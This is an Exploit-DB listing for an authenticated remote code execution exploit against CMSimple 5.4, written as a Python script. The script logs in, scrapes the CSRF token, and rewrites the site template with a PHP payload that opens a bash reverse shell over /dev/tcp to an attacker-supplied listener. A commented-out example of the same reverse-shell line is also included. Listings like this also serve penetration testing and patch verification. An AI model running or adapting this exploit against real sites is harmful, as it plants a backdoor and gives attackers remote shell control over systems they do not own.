Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)

EDB-ID:

50356

CVE:

N/A




Platform:

PHP

Date:

2021-09-30


# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 29.09.2021
# Exploit Author: pussycat0x
# Vendor Homepage: https://www.cmsimple.org/
# Version: 5.4
# Tested on: ubuntu-20.04.1

import argparse
from bs4 import BeautifulSoup
from argparse import ArgumentParser
import requests
parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
rparser = parser.add_argument_group('required argument')
rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
rparser.add_argument('-p','--password',type=str,help='', required=True)
rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
args= parser.parse_args()
#url ='192.168.1.106'
s = requests.Session()

def main():
	try:
		
		url =(args.host)
		payload = {
		'user':args.username,
		'passwd':args.password,
		'submit': 'Login',
		'login':'true',
		}
		login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
		if login.status_code == 200:
			print('Exploit Completed')
		else:
			print("Invalid Credential")
		cook =(login.cookies.get_dict())
		temp = s.get(url +'/?file=template&action=edit', cookies=cook)
		soup = BeautifulSoup(temp.text, 'lxml')
		csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
		#<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");		
		rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"""
		rev2=(args.lhost)
		rev3=(args.lport)
		rev4=""" 0>&1'");"""
		php =(rev+rev2+'/'+rev3+rev4)
		revpayload = {
		'cmsimpleDataFileStored':'cmsimpleDataFileStored',
		'csrf_token':csrfToken,
		'text':php,
		'file':'template',
		'action':'save',
		}
		shell = s.post(url +'/',cookies=cook , data=revpayload)
		exec = s.get(url+'/')
		exit()
	except:
		pass
main()